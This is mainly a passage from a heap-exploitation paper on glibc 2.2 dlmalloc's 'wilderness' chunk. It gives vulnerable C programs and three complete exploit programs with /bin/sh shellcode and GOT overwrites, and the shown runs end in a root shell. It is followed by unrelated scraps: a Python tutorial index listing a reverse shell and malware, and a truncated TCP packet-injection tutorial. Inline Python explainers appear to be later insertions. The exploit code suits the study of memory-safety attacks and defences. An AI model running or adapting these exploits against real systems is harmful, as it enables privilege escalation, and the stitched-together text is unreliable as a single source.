The wilderness is only used when a call to malloc() requests memory of a size that no other freed chunks can facilitate. If the wilderness is sufficiently large to handle the request it is split in two, one part being returned for the call to malloc(), and the other becoming the new wilderness. In the event that the wilderness is not large enough to handle the request, it is extended with sbrk() and split as described above. This behaviour means that the wilderness will always exist, and furthermore, its data section will never be used. This is called wilderness preservation, and as such, the wilderness is treated as the last resort in allocating a chunk of memory [4]. Consider the following example:

/* START wilderness.c */
#include <stdio.h>

int main(int argc, char *argv[])
{
    char *first, *second;

    first = (char *) malloc(1020);   /* [A] */
    strcpy(first, argv[1]);          /* [B] */

    second = (char *) malloc(1020);  /* [C] */
    strcpy(second, "polygoria!");

    printf("%p | %s\n", first, second);
}
/* END wilderness.c */

It can be logically deduced that since no previous calls to free() have been made, our malloc() requests are going to be serviced by the existing wilderness chunk. The wilderness is split in two at [A]: one chunk of 1024 bytes (1020 + 4 for the size field) becomes the 'first' buffer, while the remaining space is used for the new wilderness. This same process happens again at [C]. Keep in mind that the prev_size field is not used by dlmalloc if the previous chunk is allocated, and in that situation can become part of the data of the previous chunk to decrease wastage. The wilderness chunk does not utilize prev_size (there is no possibility of the top chunk being consolidated), meaning it is included at the end of the 'first' buffer at [A] as part of its 1020 bytes of data. Again, the same applies to the 'second' buffer at [C].
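The 1020 → 1024 rounding mentioned above follows dlmalloc's request-to-chunk-size rule: add SIZE_SZ (4 bytes on 32-bit x86) for the size field, round up to a multiple of 8, and enforce a floor of MINSIZE (16). A small sketch of that arithmetic (names mirror dlmalloc's constants, but the function itself is a simplified illustration):

```python
SIZE_SZ = 4            # 32-bit x86: one word for the size field
MINSIZE = 16           # smallest chunk dlmalloc will carve out
MALLOC_ALIGN_MASK = 7  # chunks are 8-byte aligned

def request2size(req):
    """Pad a malloc() request up to the real chunk size (glibc 2.2 dlmalloc)."""
    sz = (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK
    return max(sz, MINSIZE)

# malloc(1020) consumes exactly 1024 bytes, so the 'first' buffer
# ends exactly where the wilderness chunk header begins.
print(request2size(1020))  # 1024
```

This is why the overflow at [B] lands directly on the top chunk's header: there is no padding gap between the buffer and the wilderness.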
The wilderness chunk being handled specially by the dlmalloc system led to Michel "MaXX" Kaempf stating in his 'Vudo malloc tricks' [2] article, "The wilderness chunk is one of the most dangerous opponents of the attacker who tries to exploit heap mismanagement". It is this special handling of the wilderness that we will be manipulating in our exploits, turning the dangerous opponent into, perhaps, an interesting conquest.

- ------------------------------------

- ---- Exploiting the wilderness -----

- ---- Exploiting the wilderness with malloc()

Looking at our sample code above we can see that a typical buffer overflow exists at [B]. However, in this situation we are unable to use the traditional unlink technique due to the overflowed buffer being contiguous to the wilderness and the lack of a relevant call to free(). This leaves us with the second call to malloc() at [C] - we will be exploiting the special code used to set up our 'second' buffer from the wilderness.

Based on the knowledge that the 'first' buffer borders the wilderness, it is clear that not only can we control the prev_size and size elements of the top chunk, but also a considerable amount of space after the chunk header. This space is the top chunk's unused data area and proves crucial in forming a successful exploit. Lets have a look at the important chunk_alloc() code called from our malloc() requests:

/* Try to use top chunk */
/* Require that there be a remainder, ensuring top always exists */
if ((remainder_size = chunksize(top(ar_ptr)) - nb) < (long)MINSIZE) /* [A] */
{
    ...
    malloc_extend_top(ar_ptr, nb);
    ...
}

victim = top(ar_ptr);
set_head(victim, nb | PREV_INUSE);
top(ar_ptr) = chunk_at_offset(victim, nb);
set_head(top(ar_ptr), remainder_size | PREV_INUSE);
return victim;

This is the wilderness chunk code. It checks to see if the wilderness is large enough to service a request of nb bytes, then splits and recreates the top chunk as described above.
If the wilderness is not large enough to hold the minimum size of a chunk (MINSIZE) after nb bytes are used, the heap is extended using malloc_extend_top():

mchunkptr old_top = top(ar_ptr);
INTERNAL_SIZE_T old_top_size = chunksize(old_top); /* [B] */
char *brk;
...
char *old_end = (char*)(chunk_at_offset(old_top, old_top_size));
...
brk = sbrk(nb + MINSIZE); /* [C] */
...
if (brk == old_end) /* [D] */
{
    ...
    old_top = 0;
}
...
/* Setup fencepost and free the old top chunk. */
if(old_top) /* [E] */
{
    old_top_size -= MINSIZE;
    set_head(chunk_at_offset(old_top, old_top_size + 2*SIZE_SZ),
             0|PREV_INUSE);
    if(old_top_size >= MINSIZE) /* [F] */
    {
        set_head(chunk_at_offset(old_top, old_top_size),
                 (2*SIZE_SZ)|PREV_INUSE);
        set_foot(chunk_at_offset(old_top, old_top_size), (2*SIZE_SZ));
        set_head_size(old_top, old_top_size);
        chunk_free(ar_ptr, old_top);
    } else {
        ...
    }
}

The above is a simplified version of malloc_extend_top() containing only the code we are interested in. We can see the wilderness being extended at [C] with the call to sbrk(), but more interesting is the chunk_free() request in the 'fencepost' code. A fencepost is a space of memory set up for checking purposes [5]. In the case of dlmalloc they are relatively unimportant, but the code above provides the crucial element in exploiting the wilderness with malloc(). The call to chunk_free() gives us a glimpse, a remote possibility, of using the unlink() macro in a nefarious way. As such, the chunk_free() call is looking very interesting.

However, there are a number of conditions that we have to meet in order to reach the chunk_free() call reliably. Firstly, we must ensure that the if statement at [A] returns true, forcing the wilderness to be extended. Once in malloc_extend_top(), we have to trigger the fencepost code at [E]. This can be done by avoiding the if statement at [D]. Finally, we must handle the inner if statement at [F] leading to the call to chunk_free().
One other problem arises in the form of the set_head() and set_foot() calls. These could potentially destroy important data in our attack, so we must include them in our list of things to be handled. That leaves us with four items to consider just in getting to the fencepost chunk_free() call. Fortunately, all of these issues can be solved with one solution. As discussed above, we can control the wilderness' chunk header, essentially giving us control of the values returned from chunksize() at [A] and [B]. Our solution is to set the overflowed size field of the top chunk to a negative value. Lets look at why this works:

- A negative size field would trigger the first if statement at [A]. This is because remainder_size is signed, and when set to a negative number still evaluates to less than MINSIZE.

- The altered size element would be used for old_top_size, meaning the old_end pointer would appear somewhere other than the actual end of the wilderness. This means the if statement at [D] returns false and the fencepost code at [E] is run.

- The old_top_size variable is unsigned and would appear to be a large positive number when set to our negative size field. This means the statement at [F] returns true, as old_top_size evaluates to be much greater than MINSIZE.

- The potentially destructive chunk header modifying calls would only corrupt unimportant padding within our overflowed buffer, as the negative old_top_size is used for an offset.

Finally, we can reach our call to chunk_free(). Lets look at the important bits:

INTERNAL_SIZE_T hd = p->size;
...
if (!(hd & PREV_INUSE))                /* consolidate backward */  /* [A] */
{
    prevsz = p->prev_size;
    p = chunk_at_offset(p, -(long)prevsz);                         /* [B] */
    sz += prevsz;

    if (p->fd == last_remainder(ar_ptr))
        islr = 1;
    else
        unlink(p, bck, fwd);
}

The call to chunk_free() is made on old_top (our overflowed wilderness), meaning we can control p->prev_size and p->size.
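The unlink() macro reached here is the classic dlmalloc write primitive: it performs FD = P->fd; BK = P->bk; FD->bk = BK; BK->fd = FD. With fd and bk under our control, it writes our chosen bk value to fd + 12, and, as a side effect, writes fd to bk + 8 — the trashed word the exploits below jump over. A toy simulation of that pointer exchange over a flat byte array (the 8/12 offsets assume the 32-bit chunk layout; the addresses are made up for illustration):

```python
import struct

MEM = bytearray(64)  # pretend process memory, base address 0x1000
BASE = 0x1000

def write_word(addr, val):
    struct.pack_into("<I", MEM, addr - BASE, val & 0xFFFFFFFF)

def read_word(addr):
    return struct.unpack_from("<I", MEM, addr - BASE)[0]

def unlink(p):
    """dlmalloc's unlink(): FD->bk = BK; BK->fd = FD (fd at +8, bk at +12)."""
    fd = read_word(p + 8)
    bk = read_word(p + 12)
    write_word(fd + 12, bk)  # the attacker's 4-byte write
    write_word(bk + 8, fd)   # side effect: trashes a word at bk + 8

# Fake chunk at 0x1000: fd = RETLOC - 12, bk = RETADDR
RETLOC, RETADDR = 0x1010, 0x1020   # toy stand-ins for a GOT entry / shellcode
write_word(0x1000 + 8, RETLOC - 12)
write_word(0x1000 + 12, RETADDR)
unlink(0x1000)
print(hex(read_word(RETLOC)))  # 0x1020 -> RETADDR now sits at RETLOC
```

The "- 12" in the fd value exists precisely so that fd + 12 lands on the target return location, which is why every exploit in this paper sets fwd to RETLOC - 12.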
Backward consolidation is normally used to merge two free chunks together, but we will be using it to trigger the unlink() bug. Firstly, we need to ensure the backward consolidation code is run at [A]. As we can control p->size, we can trigger backward consolidation simply by clearing the overflowed size element's PREV_INUSE bit. From here, it is p->prev_size that becomes important. As mentioned above, p->prev_size is actually part of the buffer we're overflowing.

Exploiting dlmalloc by using backwards consolidation was briefly considered in the article 'Once upon a free()' [3]. The author suggests that it is possible to create a 'fake chunk' within the overflowed buffer - that is, a fake chunk relatively negative to the overflowed chunk header. This would require setting p->prev_size to a small positive number, which in turn gets complemented into its negative counterpart at [B] (digression: please excuse my stylistic habit of replacing the more technically correct "two's complement" with "complement"). However, such a small positive number would likely contain NULL terminating bytes, effectively ending our payload before the rest of the overflow is complete.

This leaves us with one other choice: creating a fake chunk relatively positive to the start of the wilderness. This can be achieved by setting p->prev_size to a small negative number, turned into a small positive number at [B]. This would require the specially crafted forward and back pointers to be situated at the start of the wilderness' unused data area, just after the chunk header. Similar to the overflowed size variable discussed above, this is convenient as the negative number need not contain NULL bytes, allowing us to continue the payload into the data area. For the sake of the exploit, lets go with a prev_size of -4 or 0xfffffffc and an overflowed size of -16 or 0xfffffff0.
Clearly, our prev_size will get turned into an offset of 4, essentially passing the point 4 bytes past the start of the wilderness (the start being the prev_size element itself) to the unlink() macro. This means that our fake fwd pointer will be at the wilderness + 12 bytes and our bck pointer at the wilderness + 16 bytes. An overflowed size of -16 places the chunk header modifying calls safely into our padding, while still satisfying all of our other requirements. Our payload will look like this:

|...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPPPP|SSSSWWWWFFFFBBBBWWWWWWWW...|

A = Target buffer that we control. Some of this will be trashed by the
    chunk header modifying calls, important when considering shellcode
    placement.
P = The prev_size element of the wilderness chunk. This is part of our
    target buffer. We set it to -4.
S = The overflowed size element of the wilderness chunk. We set it to -16.
W = Unimportant parts of the wilderness.
F = The fwd pointer for the call to unlink(). We set it to the target
    return location - 12.
B = The bck pointer for the call to unlink(). We set it to the return
    address.

We're now ready to write our exploit for the vulnerable code discussed above. Keep in mind that a malloc request for 1020 is padded up to 1024 to contain room for the size field, so we are exactly contiguous to the wilderness.

$ gcc -o wilderness wilderness.c
$ objdump -R wilderness | grep printf
08049650 R_386_JUMP_SLOT printf
$ ./wilderness 123
0x8049680 | polygoria!
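The -4 and -16 values work because dlmalloc stores sizes in unsigned 32-bit words and the consolidation code negates prev_size to form an offset: two's complement makes 0xfffffffc behave as -4 without introducing NUL bytes that would truncate the strcpy()'d payload. A quick check of that arithmetic:

```python
import struct

def as_u32(n):
    """Encode a Python int the way it lands in a 32-bit size field."""
    return struct.pack("<i", n)

# Neither value contains a NUL byte, so strcpy() copies the whole payload.
prev_size, size = as_u32(-4), as_u32(-16)
assert b"\x00" not in prev_size and b"\x00" not in size

# chunk_at_offset(p, -(long)prevsz): negating the unsigned 0xfffffffc
# yields +4, so the "fake chunk" sits 4 bytes past the wilderness start.
prevsz = struct.unpack("<I", prev_size)[0]   # 0xfffffffc
offset = (-prevsz) & 0xFFFFFFFF
print(hex(prevsz), offset)  # 0xfffffffc 4
```

With the fake chunk at wilderness + 4, its fd field (at +8 within the fake chunk) lands at wilderness + 12 and its bk at wilderness + 16, matching the F and B positions in the payload diagram above.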
/* START exploit.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC  0x08049650 /* GOT entry for printf */
#define RETADDR 0x08049680 /* start of 'first' buffer data */

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
    char *p, *payload = (char *) malloc(1052);

    p = payload;
    memset(p, '\x90', 1052);

    /* Jump 12 ahead over the trashed word from unlink() */
    memcpy(p, "\xeb\x0c", 2);

    /* We put the shellcode safely away from the possibly
     * corrupted area */
    p += 1020 - 64 - sizeof(shellcode);
    memcpy(p, shellcode, sizeof(shellcode) - 1);

    /* Set up the prev_size and overflow size fields */
    p += sizeof(shellcode) + 64 - 4;
    *(long *) p = -4;
    p += 4;
    *(long *) p = -16;

    /* Set up the fwd and bck of the fake chunk */
    p += 8;
    *(long *) p = RETLOC - 12;
    p += 4;
    *(long *) p = RETADDR;
    p += 4;
    *(p) = '\0';

    execl("./wilderness", "./wilderness", payload, NULL);
}
/* END exploit.c */

$ gcc -o exploit exploit.c
$ ./exploit
sh-2.05a#

- ---- Exploiting the wilderness with an off-by-one

Lets modify our original vulnerable code to contain an off-by-one condition:

/* START wilderness2.c */
#include <stdio.h>

int main(int argc, char *argv[])
{
    char *first, *second;
    int x;

    first = (char *) malloc(1020);

    for(x = 0; x <= 1020 && argv[1][x] != '\0'; x++) /* [A] */
        first[x] = argv[1][x];

    second = (char *) malloc(2020); /* [B] */
    strcpy(second, "polygoria!");

    printf("%p %p | %s\n", first, argv[1], second);
}
/* END wilderness2.c */

Looking at this sample code we can see the off-by-one error occurring at [A]. The loop copies 1021 bytes of argv[1] into a buffer, 'first', allocated only 1020 bytes. As the 'first' buffer was split off the top chunk in its allocation, it is exactly contiguous to the wilderness.
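The <= in the loop bound at [A] is the whole bug: indices 0 through 1020 inclusive are 1021 writes into a 1020-byte buffer, so the final byte lands on the least significant byte of the wilderness' size field. The same fencepost error, counted out explicitly:

```python
BUF_LEN = 1020

# for(x = 0; x <= 1020; x++) visits indices 0..1020 inclusive
indices = list(range(0, BUF_LEN + 1))
print(len(indices))  # 1021 writes into a 1020-byte buffer
print(indices[-1])   # index 1020: one byte past the buffer, i.e. the
                     # low byte of the top chunk's size field
```

Because the chunk is exactly 1024 bytes (1020 of data plus the 4-byte size field of the next chunk's header overlapping as usable data), that single stray byte overwrites precisely the low byte of the top chunk's size.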
This means that our one byte overflow destroys the least significant byte of the top chunk's size field. When exploiting off-by-one conditions involving the wilderness we will use a similar technique to that discussed above in the malloc() section; we want to trigger malloc_extend_top() in the second call to malloc() and use the fencepost code to cause an unlink() to occur. However, there are a couple of important issues that arise further to those discussed above.

The first new problem is found in trying to trigger malloc_extend_top() from the wilderness code in chunk_alloc(). In order to force the heap to extend, the size of the wilderness minus the size of our second request (2020) needs to be less than 16. When we controlled the entire size field in the section above this was not a problem, as we could easily set a value less than 16, but since we can only control the least significant byte of the wilderness' size field we can only decrease the size by a limited amount. This means that in some situations where the wilderness is too big we cannot trigger the heap extension code. Fortunately, it is common in real world situations to have some sort of control over the size of the wilderness through attacker induced calls to malloc().

Assuming that our larger second request to malloc() will attempt to extend the heap, we now have to address the other steps in running the fencepost chunk_free() call. We know that we can comfortably reach the fencepost code as we are modifying the size element of the wilderness. The inner if statement leading to the chunk_free() is usually triggered, as either our old_top_size is greater than 16, or the wilderness' size is small enough that controlling the least significant byte is enough to make old_top_size wrap around when MINSIZE is subtracted from it. Finally, the chunk header modifying calls are unimportant, so long as they occur in allocated memory as to avoid a premature segfault.
The reason for this will become clear in a short while. All we have left to do is to ensure that the PREV_INUSE bit is cleared for backwards consolidation at the chunk_free(). This is made trivial by our control of the size field. Once again, as we reach the backward consolidation code it is the prev_size field that becomes important. We have already determined that we have to use a negative prev_size value to ensure our payload is not terminated by stray NULL bytes. The negative prev_size field causes the backward consolidation chunk_at_offset() call to use a positive offset from the start of the wilderness. However, unlike the above situation, we do not control any of the wilderness after the overflowed least significant byte of the size field.

Knowing that we can only go forward in memory at the consolidation and that we don't have any leverage on the heap, we have to shift our attention to the stack. The stack may initially seem to be an unlikely factor when considering a heap overflow, but in our case, where we can only increase the values passed to unlink(), it becomes quite convenient, especially in a local context. Stack addresses are much higher in memory than their heap counterparts, and by correctly setting the prev_size field of the wilderness we can force an unlink() to occur somewhere on the stack. That somewhere will be our payload as it sits in argv[1].

Using this heap-to-stack unlink() technique, any possible corruption of our payload in the heap by the chunk header modifying calls is inconsequential to our exploit; the heap is only important in triggering the actual overflow, while the values for unlink() and the execution of our shellcode can be handled on the stack. The correct prev_size value can be easily calculated when exploiting a local vulnerability. We can discover the address of both argv[1] and the 'first' buffer by simulating our payload and using the output of running the vulnerable program.
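The prev_size computation used in exploit2.c below reproduces exactly this reasoning: subtract the start of the wilderness (the end of 'first' minus 4 for prev_size, i.e. FIRST + 1016) from the address of argv[1], aim 8 bytes before argv[1] so the fake chunk's fd/bk land on the first eight payload bytes, and complement. Worked through with the addresses from the paper's own test run:

```python
# Addresses from the paper's test run of wilderness2
ARGV1 = 0xbffffac9   # start of argv[1] on the stack
FIRST = 0x080496b0   # start of the 'first' heap buffer

wilderness = FIRST + 1016            # end of 'first' minus 4 (prev_size field)
prev_size = -(ARGV1 - wilderness) + 8  # same expression as in exploit2.c

# chunk_free() then computes chunk_at_offset(p, -(long)prevsz):
fake_chunk = wilderness + (-prev_size)
print(hex(fake_chunk), hex(ARGV1 - 8))  # both 0xbffffac1
```

The fake chunk at argv[1] - 8 puts its fd field (offset +8) at the very first word of argv[1] and its bk (offset +12) at the second, which is why exploit2.c writes RETLOC - 12 and the return address into the first eight bytes of the payload.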
We also know that our prev_size will be complemented into a positive offset from the start of the wilderness. To reach argv[1] at the chunk_at_offset() call we merely have to subtract the address of the start of the wilderness (the end of the 'first' buffer minus 4 for prev_size) from the address of argv[1], then complement the result. This leaves us with the following payload:

|FFFFBBBBDDDDDDDDD...DDDDDDDDPPPP|SWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the target
    return location - 12.
B = The bck pointer for the call to unlink(). We set it to the return
    address.
D = Shellcode and NOP padding, where we will return in argv[1].
P = The prev_size element of the wilderness chunk, set to the value
    computed above.
S = The overflowed byte in the size field of the wilderness. We set it
    to the lowest possible value that still clears PREV_INUSE, 2.
W = Unimportant parts of the wilderness.

$ gcc -o wilderness2 wilderness2.c
$ objdump -R wilderness2 | grep printf
08049684 R_386_JUMP_SLOT printf

/* START exploit2.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC 0x08049684 /* GOT entry for printf */
#define ARGV1  0x01020304 /* start of argv[1], handled later */
#define FIRST  0x04030201 /* start of 'first', also handled later */

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
    char *p, *payload = (char *) malloc(1028);
    long prev_size;

    p = payload;
    memset(p, '\x90', 1028);
    *(p + 1021) = '\0';

    /* Set the fwd and bck for the call to unlink() */
    *(long *) p = RETLOC - 12;
    p += 4;
    *(long *) p = ARGV1 + 8;
    p += 4;

    /* Jump 12 ahead over the trashed word from unlink() */
    memcpy(p, "\xeb\x0c", 2);

    /* Put shellcode at end of NOP sled */
    p += 1012 - 4 - sizeof(shellcode);
    memcpy(p, shellcode, sizeof(shellcode) - 1);

    /* Set up the special prev_size field. We actually want to
     * end up pointing to 8 bytes before argv[1] to ensure the
     * fwd and bck are hit right, so we add 8 before
     * complementing. */
    prev_size = -(ARGV1 - (FIRST + 1016)) + 8;
    p += sizeof(shellcode);
    *(long *) p = prev_size;

    /* Allow for a test condition that will not segfault the
     * target when getting the address of argv[1] and 'first'.
     * With 0xff malloc_extend_top() returns early due to error
     * checking. 0x02 is used to trigger the actual overflow. */
    p += 4;
    if(argc > 1)
        *(char *) p = 0xff;
    else
        *(char *) p = 0x02;

    execl("./wilderness2", "./wilderness2", payload, NULL);
}
/* END exploit2.c */

$ gcc -o exploit2 exploit2.c
$ ./exploit2 test
0x80496b0 0xbffffac9 | polygoria!
$ cat > diffex
6,7c6,7
< #define ARGV1 0x01020304 /* start of argv[1], handled later */
< #define FIRST 0x04030201 /* start of 'first', also handled later */
- ---
> #define ARGV1 0xbffffac9 /* start of argv[1] */
> #define FIRST 0x080496b0 /* start of 'first' */
$ patch exploit2.c diffex
patching file exploit2.c
$ gcc -o exploit2 exploit2.c
$ ./exploit2
sh-2.05a#

- ------------------------------------

- ---- The wilderness and free() -----

Lets now consider the following example:

/* START wilderness3a.c */
#include <stdio.h>

int main(int argc, char *argv[])
{
    char *first, *second;

    first = (char *) malloc(1020);
    strcpy(first, argv[1]);
    free(first);

    second = (char *) malloc(1020);
}
/* END wilderness3a.c */

Unfortunately, this situation does not appear to be exploitable. When exploiting the wilderness, calls to free() are your worst enemy. This is because chunk_free() handles situations directly involving the wilderness with different code to the normal backward or forward consolidation. Although this special 'top' code has its weaknesses, it does not seem possible to either directly exploit the call to free(), nor survive it in a way possible to exploit the following call to malloc().
For those interested, lets have a quick look at why:

INTERNAL_SIZE_T hd = p->size;
INTERNAL_SIZE_T sz;
...
mchunkptr next;
INTERNAL_SIZE_T nextsz;
...
sz = hd & ~PREV_INUSE;
next = chunk_at_offset(p, sz);
nextsz = chunksize(next); /* [A] */

if (next == top(ar_ptr))
{
    sz += nextsz; /* [B] */

    if (!(hd & PREV_INUSE)) /* [C] */
    {
        ...
    }

    set_head(p, sz | PREV_INUSE); /* [D] */
    top(ar_ptr) = p;
    ...
}

Here we see the code from chunk_free() used to handle requests involving the wilderness. Note that the backward consolidation within the 'top' code at [C] is uninteresting, as we do not control the needed prev_size element. This leaves us with the hope of using the following call to malloc() as described above.

In this situation we control the value of nextsz at [A]. We can see that the chunk being freed is consolidated with the wilderness. We can control the new wilderness' size as it is adjusted with our nextsz at [B], but unfortunately, the PREV_INUSE bit is set at the call to set_head() at [D]. The reason this is a bad thing becomes clear when considering the possibilities of using backward consolidation in any future calls to malloc(); the PREV_INUSE bit needs to be cleared.

Keeping with the idea of exploiting the following call to malloc() using the fencepost code, there are a few other options - all of which appear to be impossible. Firstly, forward consolidation. This is made unlikely by the fencepost chunk header modifying calls discussed above, as they usually ensure that the test for forward consolidation will fail. The frontlink() macro has been discussed [2] as another possible method of exploiting dlmalloc, but since we do not control any of the traversed chunks this technique is uninteresting. The final option was to use the fencepost chunk header modifying calls to partially overwrite a GOT entry to point into an area of memory we control.
Unfortunately, all of these modifying calls are aligned, and there doesn't seem to be anything else we can do with the values we can write.

Now that we have determined what is impossible, lets have a look at what we can do when involving the wilderness and free():

/* START wilderness3b.c */
#include <stdio.h>

int main(int argc, char *argv[])
{
    char *first, *second;

    first = (char *) malloc(1020);
    second = (char *) malloc(1020);

    strcpy(second, argv[1]); /* [A] */

    free(first);  /* [B] */
    free(second);
}
/* END wilderness3b.c */

The general aim of this contrived example is to avoid the special 'top' code discussed above. The wilderness can be overflowed at [A], but this is directly followed by a call to free(). Fortunately, the chunk to be freed is not bordering the wilderness, and thus the 'top' code is not invoked. To exploit this we will be using forward consolidation at [B], the first call to free().

/* consolidate forward */
if (!(inuse_bit_at_offset(next, nextsz)))
{
    sz += nextsz;

    if (!islr && next->fd == last_remainder(ar_ptr))
    {
        ...
    }
    else
        unlink(next, bck, fwd);

    next = chunk_at_offset(p, sz);
}

At the first call to free(), 'next' points to our 'second' buffer. This means that the test for forward consolidation looks at the size value of the wilderness. To trigger the unlink() on our 'second' buffer we need to overflow the wilderness' size field to clear the PREV_INUSE bit. Our payload will look like this:

|FFFFBBBBDDDDDDDD...DDDDDDDD|SSSSWWWWWWWWWWWWWWWW...|

F = The fwd pointer for the call to unlink(). We set it to the target
    return location - 12.
B = The bck pointer for the call to unlink(). We set it to the return
    address.
D = Shellcode and NOP padding, where we will return.
S = The overflowed size field of the wilderness chunk. A value of -4
    will do.
W = Unimportant parts of the wilderness.

We're now ready for an exploit.
$ gcc -o wilderness3b wilderness3b.c
$ objdump -R wilderness3b | grep free
0804962c R_386_JUMP_SLOT free
$ ltrace ./wilderness3b 1986 2>&1 | grep malloc | tail -n 1
malloc(1020) = 0x08049a58

/* START exploit3b.c */
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define RETLOC  0x0804962c /* GOT entry for free */
#define RETADDR 0x08049a58 /* start of 'second' buffer data */

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
    char *p, *payload = (char *) malloc(1052);

    p = payload;
    memset(p, '\x90', 1052);

    /* Set up the fwd and bck pointers to be unlink()'d */
    *(long *) p = RETLOC - 12;
    p += 4;
    *(long *) p = RETADDR + 8;
    p += 4;

    /* Jump 12 ahead over the trashed word from unlink() */
    memcpy(p, "\xeb\x0c", 2);

    /* Position shellcode safely at end of NOP sled */
    p += 1020 - 8 - sizeof(shellcode) - 32;
    memcpy(p, shellcode, sizeof(shellcode) - 1);

    p += sizeof(shellcode) + 32;
    *(long *) p = -4;
    p += 4;
    *(p) = '\0';

    execl("./wilderness3b", "./wilderness3b", payload, NULL);
}
/* END exploit3b.c */

$ gcc -o exploit3b exploit3b.c
$ ./exploit3b
sh-2.05a#

- ------------------------------------

- ---- A word on glibc 2.3 -----------

Although exploiting our examples on a glibc 2.3 system would be an interesting activity, it does not appear possible to utilize the techniques described above. Specifically, although the fencepost code exists on both platforms, the situations surrounding them are vastly different. For those genuinely interested in a more detailed explanation of the difficulties involving the fencepost code on glibc 2.3, feel free to contact me.

- ------------------------------------

- ---- Final thoughts ----------------

An overflow involving the wilderness on a glibc 2.2 platform might seem a rare or esoteric occurrence.
However, the research presented above was not prompted by divine inspiration, but in response to a tangible need. Thus it was not so much important substance that inclined me to release this paper, but rather the hope that obscure substance might be reused for some creative good by another.

- ------------------------------------

[1] http://www.phrack.org/show.php?p=61&a=6
[2] http://www.phrack.org/show.php?p=57&a=8
[3] http://www.phrack.org/show.php?p=57&a=9
[4] http://gee.cs.oswego.edu/dl/html/malloc.html
[5] http://www.memorymanagement.org/glossary/f.html#fencepost

- ------------------------------------

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3

wkYEARECAAYFAkA6PcsACgkQImcz/hfgxg0F0QCeOJsU+ZFJ+d+Cg0g5lpSio11QGqQA
n3z6846AfkvZ3/BXqUGmciT4Brvw
=k/EC
-----END PGP SIGNATURE-----

Source: https://www.thc.org/root/docs/exploit_writing/Exploiting%20the%20wilderness.txt
-
This tutorial series is designed for those who don't come from a programming background. Each tutorial covers common use cases for Python scripting geared toward InfoSec professionals, from "Hello World" to custom Python malware and exploits:

0x0 – Getting Started
0x1 – Port Scanner
0x2 – Reverse Shell
0x3 – Fuzzer
0x4 – Python to EXE
0x5 – Web Requests
0x6 – Spidering
0x7 – Web Scanning and Exploitation
0x8 – Whois Automation
0x9 – Command Automation
0xA – Python for Metasploit Automation
0xB – Pseudo-Terminal
0xC – Python Malware

Source: Python Tutorials ? Primal Security Podcast
-
[h=1]TCP Packet Injection with Python[/h]

Packet injection is the process of interfering with an established network connection by constructing arbitrary protocol packets (TCP, UDP, ...) and sending them out through raw sockets. It is widely used in network penetration testing, for example in DDoS and TCP reset attacks and in port scanning. A packet is a combination of an IP header, a TCP/UDP header and data:

Packet = IP Header + TCP/UDP Header + Data

Most operating systems that implement the socket API support packet injection, especially those based on Berkeley Sockets. Microsoft limited raw socket capabilities to packet sniffing after the release of Windows XP. This tutorial is implemented on Unix-like operating systems.

[h=3]TCP Header[/h]

The TCP protocol is the most used transport protocol on the World Wide Web. It provides reliable, ordered and error-checked delivery of a stream of bytes between programs running on computers connected to a network.

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        Sequence Number                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Acknowledgment Number                      |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Data |           |U|A|P|R|S|F|                               |
   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
   |       |           |G|K|H|T|N|N|                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |         Urgent Pointer        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                             data                              |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Sequence Number (32 bits): The sequence number of the first data byte in this segment.
If the SYN flag is set, the sequence number is the initial sequence number (ISN, usually 0), and the first data byte in the stream is numbered ISN+1.

Acknowledgment Number (32 bits): If the ACK flag is set, this field contains the next sequence number the destination machine expects to receive. For every packet sent that contains data, an acknowledgment packet should be received, confirming that the last packet arrived successfully.

Data Offset (4 bits): The length of the TCP header expressed as a number of 32-bit words; this indicates where the data begins.

Reserved (6 bits): Usually cleared to zero.

Control Bits (6 bits):
ACK: Acknowledgment packet
SYN: Request to establish a connection
